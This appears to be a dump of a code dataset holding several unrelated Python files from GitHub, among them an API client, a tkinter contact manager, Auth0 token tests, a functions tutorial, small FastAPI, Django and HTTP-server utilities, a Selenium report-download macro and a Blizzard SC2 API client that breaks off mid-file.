os.path.exists(destination) or os.path.isdir(destination):\n regex_file_name = re.search('filename=\"([^\"]+)',res.headers['Content-Disposition'] )\n destination = os.path.join(destination, regex_file_name.groups()[0])\n\n with open(destination, 'wb+') as f:\n f.write(res.content)\n\n return destination\n\n def to_json(self):\n ds = self._json_data.get('dataset')\n if ds is not None:\n clean_generic_object_json(ds, self, self._mapping)\n ds['changed'] = True\n\nclass Analyses(dict):\n def __init__(self, data, session: Connection):\n super().__init__()\n self._session = session\n self.id = data.get('id')\n self.type = data.get('extended_metadata', {}).get('kind', '')\n\n self._data = data\n self['name'] = data['name']\n self['description'] = data['description']\n self.datasets = []\n for jd in self._data.get('children'):\n self.datasets.append(Dataset(session, jd))\n\n def preview_image(self):\n if self._data.get('preview_img') is None or self._data.get('preview_img').get('id') is None:\n return None\n return self._load_image(self._data.get('preview_img').get('id'))\n\n def _load_image(self, file_id: int):\n image_url = \"/api/v1/attachments/{}\".format(file_id)\n res = self._session.get(image_url)\n if res.status_code != 200:\n raise ConnectionRefusedError('{} -> {}'.format(res.status_code, res.text))\n\n return res.content\n\n def to_josn(self):\n self._data['name'] = self['name']\n self._data['description'] = self['description']\n for ds in self.datasets:\n ds.to_json()\n return self._data\n\n\nclass Segment(dict):\n def __init__(self, generic_segments: GenericSegments, element_type: str, on_add, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._generic_segments = generic_segments\n self._element_type = element_type\n self._on_add = on_add\n\n def get(self, key):\n val = super().get(key)\n if val is None:\n seg = next((x for x in self._generic_segments.all_classes if x.get('label') == key), None)\n if seg.get('element_klass').get('name') != self._element_type:\n raise TypeError('Segemnt \"{}\" is not for element \"{}\"'.format(key, self._element_type))\n new_seq_obj = GenericSegments.new_session(seg)\n key = add_to_dict(self, key, None)\n val = self[key] = self._on_add(key, new_seq_obj)\n return val\n\n\nclass AbstractElement:\n element_type = None\n def __init__(self, generic_segments: GenericSegments, session: Connection, json_data: dict = None, id: int = None, element_type: str = None):\n self._generic_segments = generic_segments\n self._session = session\n if json_data is not None:\n self._set_json_data(json_data)\n elif id is not None and element_type is not None:\n self.id = id\n self.element_type = element_type\n self.load()\n else:\n raise ValueError(\"Either 'json_data' or 'id' and 'element_type' must be provided during initialization\")\n def load(self):\n\n payload = {}\n res = self._session.get(\"{}/{}.json\".format(self.__class__.get_url(self.element_type), self.id),\n data=payload)\n if res.status_code != 200:\n raise RequestException(\"{} -> {}\".format(res.status_code, res.text))\n json_data = res.json()[self.get_response_key(self.element_type)]\n self._set_json_data(json_data)\n\n\n def _set_json_data(self, json_data):\n self.json_data = json_data\n\n self.short_label = self.json_data.get('short_label')\n self.id = json_data.get('id')\n self.element_type = json_data.get('type')\n\n self.properties: dict = self._parse_properties()\n self.analyses: list[dict] = self._parse_analyses()\n segment_temp = self._parse_segments()\n self._segments_mapping = 
segment_temp.get('obj_mapping')\n self.segments = Segment(self._generic_segments,\n json_data.get('type'),\n self._on_add_segment,\n segment_temp.get('values'))\n add_to_dict(self.segments, 'Properties', self.properties)\n add_to_dict(self.segments, 'Analyses', self.analyses)\n\n def _on_add_segment(self, key: str, segment_data: dict) -> dict:\n temp_segment = parse_generic_object_json(segment_data)\n self._segments_mapping[key] = temp_segment.get('obj_mapping')\n self.json_data.get('segments', []).append(segment_data)\n return temp_segment.get('values')\n\n def save(self):\n data = self.clean_data()\n is_created = False\n if self.id is None:\n data['id'] = uuid.uuid4().__str__()\n res = self._session.post(self.save_url(), data=json.dumps(data))\n is_created = True\n else:\n res = self._session.put(self.save_url(), data=json.dumps(data))\n if res.status_code != 200 and res.status_code != 201:\n raise RequestException('{} -> '.format(res.status_code, res.text))\n if is_created:\n self._set_json_data(res.json()[self.element_type])\n\n def clean_data(self):\n self._clean_segments_data()\n self._clean_properties_data()\n self._clean_analyses_data()\n return self.json_data\n\n def save_url(self):\n if self.id is not None:\n return \"/api/v1/{}s/{}\".format(self.json_data.get('type'), self.id)\n return \"/api/v1/{}s\".format(self.json_data.get('type'))\n\n def _parse_properties(self) -> dict:\n raise NotImplemented\n\n def _clean_properties_data(self) -> dict:\n raise NotImplemented\n\n def _parse_analyses(self) -> list:\n analyses_list = []\n container = self.json_data.get('container')\n if container is not None:\n for analyses in container.get('children', [{}])[0].get('children', []):\n analyses_list.append(Analyses(analyses, self._session))\n return analyses_list\n\n def _clean_analyses_data(self):\n container = self.json_data.get('container')\n if container is None:\n return []\n res_list = container.get('children', [{}])[0].get('children', [])\n for (idx, analyses) in enumerate(res_list):\n analyses_obj: list[Analyses] = [item for (index, item) in enumerate(self.analyses) if\n item.id == analyses.get('id')]\n if len(analyses_obj) == 1:\n new_data = analyses_obj[0].to_josn()\n for (key, item) in analyses.items():\n if key in new_data:\n res_list[idx][key] = new_data.get(key, res_list[idx][key])\n\n return res_list\n\n def _parse_segments(self) -> dict[str: dict]:\n results: dict[str: dict] = {}\n results_mapping: dict[str: dict] = {}\n for segment in self.json_data.get('segments', []):\n a = [x for x in self._generic_segments.all_classes if x['id'] == segment['segment_klass_id']]\n temp_segment = parse_generic_object_json(segment)\n key = add_to_dict(results, a[0].get('label', 'no_label'), temp_segment.get('values'))\n results_mapping[key] = temp_segment.get('obj_mapping')\n return {'values': results, 'obj_mapping': results_mapping}\n\n def _clean_segments_data(self):\n res_list = self.json_data.get('segments', [])\n for (seg_key, segment_mapping) in self._segments_mapping.items():\n list_idx = next(i for (i, x) in enumerate(res_list) if x.get('id') == segment_mapping['__id'])\n clean_generic_object_json(res_list[list_idx], self.segments[seg_key], segment_mapping)\n\n\n\n @classmethod\n def get_response_key(cls, name):\n if name == 'sample':\n return 'sample'\n elif name == 'reaction':\n return 'reaction'\n elif name == 'wellplate':\n return 'wellplate'\n elif name == 'research_plan':\n return 'research_plan'\n return 'element'\n\n @classmethod\n def get_url(cls, name):\n if name == 
'sample':\n return '/api/v1/samples'\n elif name == 'reaction':\n return '/api/v1/reactions'\n elif name == 'wellplate':\n return '/api/v1/wellplates'\n elif name == 'research_plan':\n return '/api/v1/research_plans'\n return f'/api/v1/generic_elements'\n","repo_name":"StarmanMartin/ChemotionApi","sub_path":"chemotion_api/elements/abstract_element.py","file_name":"abstract_element.py","file_ext":"py","file_size_in_byte":10363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6698804202","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\nclass ContactManager:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Contact Manager\")\r\n\r\n self.contacts = []\r\n self.current_contact = None\r\n\r\n self.name_label = tk.Label(root, text=\"Name:\")\r\n self.name_label.pack()\r\n\r\n self.name_entry = tk.Entry(root)\r\n self.name_entry.pack()\r\n\r\n self.phone_label = tk.Label(root, text=\"Phone:\")\r\n self.phone_label.pack()\r\n\r\n self.phone_entry = tk.Entry(root)\r\n self.phone_entry.pack()\r\n\r\n self.email_label = tk.Label(root, text=\"Email:\")\r\n self.email_label.pack()\r\n\r\n self.email_entry = tk.Entry(root)\r\n self.email_entry.pack()\r\n\r\n self.address_label = tk.Label(root, text=\"Address:\")\r\n self.address_label.pack()\r\n\r\n self.address_entry = tk.Entry(root)\r\n self.address_entry.pack()\r\n\r\n self.add_button = tk.Button(root, text=\"Add Contact\", command=self.add_contact)\r\n self.add_button.pack()\r\n\r\n self.view_button = tk.Button(root, text=\"View Contacts\", command=self.view_contacts)\r\n self.view_button.pack()\r\n\r\n self.search_label = tk.Label(root, text=\"Search:\")\r\n self.search_label.pack()\r\n\r\n self.search_entry = tk.Entry(root)\r\n self.search_entry.pack()\r\n\r\n self.search_button = tk.Button(root, text=\"Search Contacts\", command=self.search_contacts)\r\n self.search_button.pack()\r\n\r\n self.update_button = tk.Button(root, text=\"Update Contact\", command=self.update_contact)\r\n self.update_button.pack()\r\n\r\n self.delete_button = tk.Button(root, text=\"Delete Contact\", command=self.delete_contact)\r\n self.delete_button.pack()\r\n\r\n def add_contact(self):\r\n name = self.name_entry.get()\r\n phone = self.phone_entry.get()\r\n email = self.email_entry.get()\r\n address = self.address_entry.get()\r\n\r\n if name and phone:\r\n self.contacts.append({\"name\": name, \"phone\": phone, \"email\": email, \"address\": address})\r\n messagebox.showinfo(\"Success\", \"Contact added successfully.\")\r\n else:\r\n messagebox.showerror(\"Error\", \"Name and phone are required.\")\r\n\r\n def view_contacts(self):\r\n view_window = tk.Toplevel(self.root)\r\n view_window.title(\"View Contacts\")\r\n\r\n for contact in self.contacts:\r\n contact_text = f\"Name: {contact['name']}\\nPhone: {contact['phone']}\\nEmail: {contact['email']}\\nAddress: {contact['address']}\\n\"\r\n contact_label = tk.Label(view_window, text=contact_text)\r\n contact_label.pack()\r\n\r\n def search_contacts(self):\r\n query = self.search_entry.get()\r\n results = []\r\n\r\n for contact in self.contacts:\r\n if query.lower() in contact['name'].lower() or query in contact['phone']:\r\n results.append(contact)\r\n\r\n if results:\r\n result_window = tk.Toplevel(self.root)\r\n result_window.title(\"Search Results\")\r\n\r\n for contact in results:\r\n contact_text = f\"Name: {contact['name']}\\nPhone: {contact['phone']}\\nEmail: {contact['email']}\\nAddress: 
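# Quick check of the Content-Disposition filename extraction used in
# write_zip()/write_data_set_xlsx() above (the header value is a made-up
# example):
import re
header = 'attachment; filename="dataset.xlsx"'
assert re.search('filename="([^"]+)', header).groups()[0] == 'dataset.xlsx'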
{contact['address']}\\n\"\r\n contact_label = tk.Label(result_window, text=contact_text)\r\n contact_label.pack()\r\n else:\r\n messagebox.showinfo(\"No Results\", \"No contacts found matching the search.\")\r\n\r\n def update_contact(self):\r\n if self.current_contact:\r\n updated_name = self.name_entry.get()\r\n updated_phone = self.phone_entry.get()\r\n updated_email = self.email_entry.get()\r\n updated_address = self.address_entry.get()\r\n\r\n self.current_contact['name'] = updated_name\r\n self.current_contact['phone'] = updated_phone\r\n self.current_contact['email'] = updated_email\r\n self.current_contact['address'] = updated_address\r\n\r\n self.current_contact = None\r\n messagebox.showinfo(\"Success\", \"Contact updated successfully.\")\r\n else:\r\n messagebox.showerror(\"Error\", \"No contact selected for update.\")\r\n\r\n def delete_contact(self):\r\n if self.current_contact:\r\n self.contacts.remove(self.current_contact)\r\n self.current_contact = None\r\n messagebox.showinfo(\"Success\", \"Contact deleted successfully.\")\r\n else:\r\n messagebox.showerror(\"Error\", \"No contact selected for deletion.\")\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n app = ContactManager(root)\r\n root.mainloop()\r\n","repo_name":"Laibak12/Codsoft_Augustbatch","sub_path":"contact book.py","file_name":"contact book.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32976690457","text":"import pytest\nimport jwt\nfrom fastapi import HTTPException, status\n\nfrom optipy.api.exceptions import BadRequestFromRaisedException\nfrom optipy.config import settings\n\nfrom ..auth0 import VerifyToken\n\n\n@pytest.fixture\ndef verify_token():\n return VerifyToken()\n\n\nclass TestVerifyToken:\n\n def test_verify_valid_token(self, mocker, verify_token):\n key = \"test_key\"\n mock_jwks_client = mocker.MagicMock()\n mock_jwks_client.get_signing_key_from_jwt.return_value = mocker.MagicMock(\n key=key\n )\n verify_token.jwks_client = mock_jwks_client\n\n token = \"valid_token\"\n decoded_token = {\"sub\": \"12345\", \"name\": \"John Doe\"}\n\n mock_decode = mocker.MagicMock()\n mock_decode.return_value = decoded_token\n mocker.patch(\"jwt.decode\", mock_decode)\n\n result = verify_token.verify(token)\n\n assert result == decoded_token\n mock_decode.assert_called_with(\n token,\n key,\n algorithms=settings.AUTH0_ALGORITHMS,\n audience=settings.AUTH0_API_AUDIENCE,\n issuer=settings.AUTH0_ISSUER\n )\n\n def test_verify_invalid_jwk_client(self, mocker, verify_token):\n mock_jwks_client = mocker.MagicMock()\n mock_jwks_client.get_signing_key_from_jwt.side_effect = jwt.exceptions.PyJWKClientError\n verify_token.jwks_client = mock_jwks_client\n\n token = \"invalid_token\"\n\n with pytest.raises(HTTPException) as exc_info:\n verify_token.verify(token)\n\n assert exc_info.value.status_code == status.HTTP_400_BAD_REQUEST\n assert exc_info.value.detail == \"Error while trying to initialize JWK client.\"\n\n def test_verify_decode_error(self, mocker, verify_token):\n mock_jwks_client = mocker.MagicMock()\n mock_jwks_client.get_signing_key_from_jwt.side_effect = jwt.exceptions.DecodeError\n verify_token.jwks_client = mock_jwks_client\n\n token = \"invalid_token\"\n\n with pytest.raises(HTTPException) as exc_info:\n verify_token.verify(token)\n\n assert exc_info.value.status_code == status.HTTP_400_BAD_REQUEST\n assert exc_info.value.detail == \"Error decoding JWT token.\"\n\n def 
test_verify_invalid_token(self, mocker, verify_token):\n        mock_jwks_client = mocker.MagicMock()\n        mock_jwks_client.get_signing_key_from_jwt.return_value = mocker.MagicMock()\n        verify_token.jwks_client = mock_jwks_client\n\n        token = \"invalid_token\"\n\n        with pytest.raises(HTTPException) as exc_info:\n            verify_token.verify(token)\n\n        assert exc_info.value.status_code == status.HTTP_400_BAD_REQUEST\n        assert exc_info.value.detail == \"Error decoding JWT token\"\n\n    def test_verify_generic_exception(self, mocker, verify_token):\n        mock_jwks_client = mocker.MagicMock()\n        mock_jwks_client.get_signing_key_from_jwt.return_value = mocker.MagicMock(\n            key=\"dummy_key\"\n        )\n        verify_token.jwks_client = mock_jwks_client\n\n        token = \"valid_token\"\n        exception_message = \"Something went wrong\"\n        exception = Exception(exception_message)\n\n        mock_decode = mocker.MagicMock(side_effect=exception)\n        mocker.patch(\"jwt.decode\", mock_decode)\n\n        with pytest.raises(BadRequestFromRaisedException) as exc_info:\n            verify_token.verify(token)\n        assert str(exc_info.value) == exception_message\n","repo_name":"zigcccc/optipy","sub_path":"optipy/auth/tests/test_auth0.py","file_name":"test_auth0.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"22676788128","text":"# FUNCTIONS\r\n\r\n# Without arguments\r\n\r\n# def creates a function\r\n# Define my function\r\ndef rocket_parts():\r\n    print('payload, propellant, structure')\r\n\r\n# Call my function\r\nrocket_parts()\r\n\r\noutput = rocket_parts()\r\nprint(output)\r\n\r\ndef rocket_parts2():\r\n    return 'payload, propellant, structure'\r\n\r\noutput2 = rocket_parts2()\r\nprint(output2)\r\n\r\n# Arguments\r\ndef distance_from_earth(destination):\r\n    if destination == 'Moon':\r\n        return '238,855'\r\n    else:\r\n        return 'Unable to compute to that destination'\r\n\r\nprint(distance_from_earth('Moon'))\r\nprint(distance_from_earth('Saturn'))\r\n\r\n# Several arguments\r\ndef days_to_complete(distance, speed):\r\n    hours = distance/speed\r\n    return hours/24\r\n\r\nprint(round(days_to_complete(238855, 75)))\r\n\r\n# Keyword arguments\r\nfrom datetime import timedelta, datetime\r\n\r\ndef arrival_time(hours=51):\r\n    now = datetime.now() # datetime gives the current time\r\n    arrival = now + timedelta(hours=hours) # timedelta supports addition, yielding a new time object\r\n    return arrival.strftime('Arrival: %A %H:%M')\r\n\r\nprint(arrival_time())\r\n\r\nprint(arrival_time(hours=0))\r\n\r\n# Combining arguments\r\nfrom datetime import timedelta, datetime\r\n\r\ndef arrival_time(destination, hours=51):\r\n    now = datetime.now()\r\n    arrival = now + timedelta(hours=hours)\r\n    return arrival.strftime(f'{destination} Arrival: %A %H:%M')\r\n\r\nprint(arrival_time('Moon'))\r\n\r\nprint(arrival_time('Orbit', hours=0.13))\r\n\r\n# Variable arguments\r\ndef variable_length(*args):\r\n    print(args)\r\n\r\nprint(variable_length())\r\nprint(variable_length('one', 'two'))\r\nprint(variable_length(None))\r\n\r\n\r\ndef sequence_time(*args):\r\n    total_minutes = sum(args)\r\n    if total_minutes < 60:\r\n        return f'Total time to launch is {total_minutes} minutes'\r\n    else:\r\n        return f'Total time to launch is {total_minutes/60} hours'\r\n\r\nprint(sequence_time(4, 14, 18))\r\nprint(sequence_time(4, 14, 48))\r\n\r\n# Variable keyword arguments\r\ndef variable_length(**kwargs):\r\n    
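# A short sketch combining the two variable-argument forms demonstrated in
# this tutorial (hypothetical function, not part of the original lesson):
def launch_report(*args, **kwargs):
    print(f'{sum(args)} minutes to launch; crew of {len(kwargs)}')

launch_report(4, 14, 18, captain='Neil Armstrong', pilot='Buzz Aldrin')
# -> 36 minutes to launch; crew of 2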
print(kwargs)\r\nprint(variable_length(tanks=1, day='Wednesday', pilots=3))\r\n\r\ndef crew_members(**kwargs):\r\n print(f'{len(kwargs)} astronauts assigned for this mission:')\r\n for title, name in kwargs.items():\r\n print(f'{title}: {name}')\r\n\r\nprint(crew_members(captain='Neil Armstrong', pilot='Buzz Aldrin', command_pilot='Michael Collins'))","repo_name":"LuisAlvizo/LaunchX_PrimeraMision","sub_path":"09_Funciones/Documentacion09.py","file_name":"Documentacion09.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38727321355","text":"from http import HTTPStatus\n\nfrom aiohttp import ClientError, ClientSession\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom app.core.config import settings\nfrom app.crud.carton import BASE_CARTON, carton_crud\nfrom app.crud.item import item_crud\nfrom app.models import OrderCarton\nfrom app.models.order import Order\n\nSTATUS = '/health'\nPACK = '/pack'\nSTATUS_URL = settings.pack_service_url + STATUS\nPACK_URL = settings.pack_service_url + PACK\n\n\nasync def get_best_pack(\n order: Order,\n data: dict,\n session: AsyncSession\n) -> None:\n \"\"\"Запрашивает лучшую упаковку и сохраняет её в заказ.\"\"\"\n bestpack_data = {'carton': BASE_CARTON}\n try:\n async with ClientSession() as http_session:\n async with http_session.get(STATUS_URL) as response:\n if response.status == HTTPStatus.OK:\n async with http_session.get(\n PACK_URL,\n json=data\n ) as response:\n bestpack_data = await response.json()\n except ClientError as error:\n f'Упаковка не получена. '\n f'Ошибка при выполнении HTTP запроса: {error}'\n if isinstance(bestpack_data, dict):\n cartontype = bestpack_data.get('carton', BASE_CARTON)\n elif isinstance(bestpack_data, list) and bestpack_data:\n cartontype = bestpack_data[0]\n else:\n cartontype = bestpack_data\n carton = await carton_crud.get_carton_by_type(\n cartontype, session\n )\n order_carton = OrderCarton(\n order=order,\n carton=carton,\n amount=1\n )\n session.add(order_carton)\n if 'wrappers' in bestpack_data:\n wrappers = bestpack_data['wrappers']\n for wrapper in wrappers:\n if 'sku' in wrapper and 'wrapper' in wrapper:\n for wrap in wrappers:\n await item_crud.get_wrapper(\n wrap['sku'],\n wrap['wrapper'],\n session\n )\n","repo_name":"40-nog/yandex_hackaton_pack_project","sub_path":"backend/app/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8471220991","text":"from selenium import webdriver\nfrom datetime import date\nfrom datetime import datetime\nimport time\nimport os\nimport random\nprint(\"_______________________________________________\")\nprint(\"*** Made By Park HyungJune copyright @ DevHyung\")\nprint(\">>> This program semi Auto version \")\nprint(\">>> 현대카드 버전\")\nf = open(\"option.txt\", 'r', encoding='utf8')\noption = f.readlines()\nid = option[2].strip()\npw = option[4].strip()\nprint(\">>>ID, PW :: \",id,pw)\ndef hyundae():\n try:\n chromeOptions = webdriver.ChromeOptions()\n prefs = {\"download.default_directory\": os.getcwd() + \"\\현대\"}\n chromeOptions.add_experimental_option(\"prefs\", prefs)\n driver = webdriver.Chrome(executable_path=\"./chromedriver\", chrome_options=chromeOptions)\n driver.maximize_window()\n driver.get('https://www.hyundaicard.com/csa/mb/STOREMAIN.hc')\n time.sleep(5)\n input(\">>> 로그인후 엔터를 눌주세요\")\n xplist = 
['//*[@id=\"header\"]/div[2]/div/h1/a','//*[@id=\"container\"]/div[1]/ul/ul[1]/li[4]/dl/dd/ul/li[1]']\n tmpidx = 0\n while True:\n print(\"_\"*30)\n print(\">>> 매일 새벽 6:20 분에 자동으로 작동 시작됩니다.\")\n print(\">>> 작동시작 시간 : \", datetime.now())\n print(\">>> 대기중...\")\n while True:\n # if your start 6:20 below start 6:21\n time.sleep(random.randint(57,60))\n curTime = datetime.now()\n if (curTime.hour == 6 and curTime.minute == 20):\n print(\">>> Try Time : \", curTime)\n print(\">>> 보안프로그램 업데이트 또는, 사이트개편으로 실패한것만 아래에 로그가 남습니다.\")\n tmpidx = 0\n break\n try:\n driver.find_element_by_xpath(xplist[tmpidx%2]).click()\n except:\n driver.find_element_by_xpath(xplist[0]).click()\n tmpidx+=1\n time.sleep(1)\n today = date.today().strftime(\"%Y%m%d\")\n yesterday = date.fromtimestamp(time.time() - 60 * 60 * 24).strftime(\"%Y%m%d\")\n driver.find_element_by_xpath('//*[@id=\"container\"]/div[1]/ul/ul[1]/li[4]/dl/dd/ul/li[1]').click()\n time.sleep(3)\n driver.find_element_by_xpath('//*[@id=\"iqryPrd1\"]').clear()\n driver.find_element_by_xpath('//*[@id=\"iqryPrd1\"]').send_keys(yesterday)\n driver.find_element_by_xpath('//*[@id=\"iqryPrd2\"]').clear()\n driver.find_element_by_xpath('//*[@id=\"iqryPrd2\"]').send_keys(today)\n driver.find_element_by_xpath('//*[@id=\"searchBtn1\"]').click()\n time.sleep(5)\n driver.find_element_by_xpath('//*[@id=\"excelBtn1\"]').click()\n time.sleep(10)\n driver.get('https://www.hyundaicard.com/csa/mb/STOREMAIN.hc')\n except:\n print(\">>> 현대 오류\")\n driver.save_screenshot(os.getcwd()+\"\\현대오류.jpg\")\n driver.quit()\nif __name__==\"__main__\":\n hyundae()\n input()\n","repo_name":"DevHyung/macro-banksite-login","sub_path":"Hyundae.py","file_name":"Hyundae.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36787594696","text":"import os\n\n\nPROJECT_DIR = os.path.dirname(__file__)\n\nDEBUG = True\nSECRET_KEY = \"Your secret key here.\"\n\nOUTPUT_FILENAME = 'output.log'\nUPLOAD_FOLDER = os.path.join(PROJECT_DIR, 'output')\nMAX_CONTENT_LENGTH = 0.1 * 1024 * 1024\n\n\nJOBS_DIR = os.path.join(PROJECT_DIR, 'jobs')\n\n# Timeout out in seconds for each run, None for unlimited\n# (uses timeout command)\nJOBS_TIMEOUT = 30\n\nJOBS = {}\n","repo_name":"matiasb/jaime","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30733518421","text":"import http, os, sys # tested on python 3.8.5\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\n\nIP=(\"127.0.0.1\") # local web server IP\nPORT=(80) # local web server port\nWWW=(\"joshek-www/\") # directory where files are stored\naddress=(str(IP), PORT) # combined variables for httpServer\nserverURL=(\"http://\"+str(IP)+\":\"+(str(PORT))) # prettyprint the http server URL\n\nhttpServer = HTTPServer(server_address=(IP, PORT), RequestHandlerClass=CGIHTTPRequestHandler) # defines the httpServer object\nos.chdir(WWW) # set current directory as set in the WWW variable\nprint(\"URL: \" + str(serverURL)) # prints a url to the webserver\nprint(\"WWW folder: \" + str(os.getcwd())) # current directory\nprint(\"WWW files: \" + str(os.listdir(\".\"))) # list files in current directory\n\ntry:\n print(\"Starting HTTP server, stop with ^C \\n\")\n httpServer.serve_forever()\nexcept KeyboardInterrupt:\n print(\"Stopping...\")\n 
exit()\n","repo_name":"SkryptKiddie/codedumps","sub_path":"webServer.py","file_name":"webServer.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
+{"seq_id":"28899731839","text":"# Django\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.conf import settings\n# from django.core.mail import send_mail\n\n\n# Send emails with Django\nclass MailService:\n    \"\"\"\n    A class to handle email sending using Django's EmailMultiAlternatives.\n\n    This class encapsulates the functionality to compose and send emails with HTML content.\n    The sender address is read from settings.EMAIL_HOST_USER.\n\n    Attributes:\n        subject (str): The subject of the email.\n        message (str): The main message body of the email.\n        to_email (list[str] or str): The recipient address, or a list of addresses, to send the email to.\n\n    Methods:\n        __init__(subject, to_email, message):\n            Initializes the MailService instance with the necessary email details.\n        send_mail_with_html(html_content):\n            Sends an HTML-formatted email.\n\n    Usage:\n        mail_service = MailService(\n            'Subject of the email',\n            ['recipient1@example.com', 'recipient2@example.com'],\n            'Main message body'\n        )\n        mail_service.send_mail_with_html('
    <p>This is an HTML formatted email.</p>
    ')\n \"\"\"\n\n def __init__(\n self, subject: str,\n to_email,\n message: str = '') -> None:\n \"\"\"\n Initializes the MailService instance.\n\n :param str subject: Subject of the email\n :param str message: Message of the email\n :param list[str] or str to_email: List of emails to send\n \"\"\"\n\n self.subject = subject\n self.message = message\n self.to_email = to_email\n\n if isinstance(self.to_email, str):\n self.to_email = [self.to_email]\n\n if isinstance(self.to_email, list):\n self.to_email = self.to_email\n\n self.fetch_email_service = EmailMultiAlternatives(\n self.subject,\n self.message,\n settings.EMAIL_HOST_USER, # from_email\n self.to_email\n )\n\n def send_mail_with_html(self, html_content) -> None:\n \"\"\"\n Sends an HTML-formatted email.\n\n :param str html_content: HTML content of the email\n \"\"\"\n email = self.fetch_email_service\n\n email.attach_alternative(html_content, \"text/html\")\n email.send()\n print('send email')\n","repo_name":"JuanCarlosAguilarB/ecommerce-project-backend-django","sub_path":"apps/commons/mail_service.py","file_name":"mail_service.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72181414333","text":"from fastapi import APIRouter,Depends\nfrom sqlalchemy.orm import Session\nfrom config.database import get_db\n\nfrom models.parking_spot_model import ParkingSpot\n\nfrom schemas.parking_spot_schema import ParkingSpotSchema\n \nrouter = APIRouter(\n prefix=\"/parking-spot\",\n tags=[\"ParkingSpot\"]\n)\n\n\n@router.get(\"/\")\nasync def get_parking_spot(db:Session = Depends(get_db)):\n data = db.query(ParkingSpot).all()\n return data\n\n@router.post(\"/\")\nasync def add_spot(parkingSpot:ParkingSpotSchema,db:Session = Depends(get_db)):\n \n try: \n # **obj will unpack dict object/ in JS ...data\n spot = ParkingSpot(**parkingSpot.toJson())\n db.add(spot)\n db.commit()\n \n return {\"message\": f\"{spot.spotCode} is Added\"}\n \n except Exception as e:\n raise e\n","repo_name":"Brix101/Parking-Lot-MS","sub_path":"python-server/routes/parking_spot_routes.py","file_name":"parking_spot_routes.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"1362199149","text":"import os\nimport requests\nimport json\nimport config\n\n_CLIENT = config.BZ_OAUTH_CLIENT\n_TOKEN = config.BZ_OAUTH_SECRET\n_region_Name = config.BZ_REGION\n_REGION = {\"id\" : 2 if _region_Name == \"eu\" else 1 if _region_Name == 'us' else 3 if _region_Name == 'kr' else 4, 'name' : _region_Name}\n_BASE_BNET_URL = \"https://{region}.battle.net\".format(region=_REGION['name'])\n_BASE_API_URL = \"https://{region}.api.blizzard.com\".format(region=_REGION['name'])\n\n\ndef get_access_token():\n \"\"\"Gets OAuth access TOKEN\n\n Returns:\n [str]: access token (expires in 24hrs)\n \"\"\"\n url = _BASE_BNET_URL + \"/oauth/token\"\n data = {\"grant_type\": \"client_credentials\"}\n r = post_api(url, data)\n if r.status_code == 200:\n response = json.loads(r.content)\n return response[\"access_token\"]\n return False\n\n\ndef get_player_meta(profileId, regionId=_REGION['id'], realmId=1):\n \"\"\"Returns metadata for an individual's profile.\n\n Args:\n profileId (int): SC2 profile ID (get it in starcraft2.com)\n\n Returns:\n [json]: player meta info\n \"\"\"\n url = _BASE_API_URL + \"/sc2/metadata/profile/{regionId}/{realmId}/{profileId}\".format(regionId=regionId, realmId=realmId, 
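# Minimal usage sketch for the MailService class above, assuming Django
# settings (EMAIL_HOST_USER, EMAIL_BACKEND, ...) are configured; the
# addresses are placeholders.
service = MailService('Welcome', ['recipient1@example.com'], 'Plain-text body')
service.send_mail_with_html('<p>This is an HTML formatted email.</p>')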
profileId=profileId)\n r = get_api(url)\n if r.status_code == 200:\n response = json.loads(r.content)\n return response\n return r.status_code\n\ndef get_player_info(profileId, regionId=_REGION['id'], realmId=1):\n \"\"\"Returns data about an individual SC2 profile.\n\n Args:\n profileId (int): SC2 profile ID (get it in starcraft2.com)\n\n Returns:\n json: player extended info\n \"\"\"\n url = _BASE_API_URL + \"/sc2/profile/{regionId}/{realmId}/{profileId}\".format(regionId=regionId, realmId=realmId, profileId=profileId)\n return get_api(url)\n\ndef get_ladder_summary(profileId, regionId=_REGION['id'], realmId=1):\n \"\"\"Returns a ladder summary for an individual SC2 profile.\n\n Args:\n profileId (int): SC2 profile ID (get it in starcraft2.com)\n\n Returns:\n [json]: player's ladders summary\n \"\"\"\n url = _BASE_API_URL + \"/sc2/profile/{regionId}/{realmId}/{profileId}/ladder/summary\".format(regionId=regionId, realmId=realmId, profileId=profileId)\n return get_api(url)\n\ndef get_ladder_info(profileId, ladderid, regionId=_REGION['id'], realmId=1):\n \"\"\"Returns data about an individual profile's ladder.\n\n Args:\n profileId (int): SC2 profile ID (get it in starcraft2.com)\n ladderid (int): Ladder unique ID (get it in the player' ladder summary)\n\n Returns:\n [json]: Specific ladder info\n \"\"\"\n url = _BASE_API_URL + \"/sc2/profile/{regionId}/{realmId}/{profileId}/ladder/{ladderId}\".format(regionId=regionId, realmId=realmId, profileId=profileId, ladderId=ladderid)\n return get_api(url)\n\n\ndef post_api(url, data):\n \"\"\"Send POST request to the API\n\n 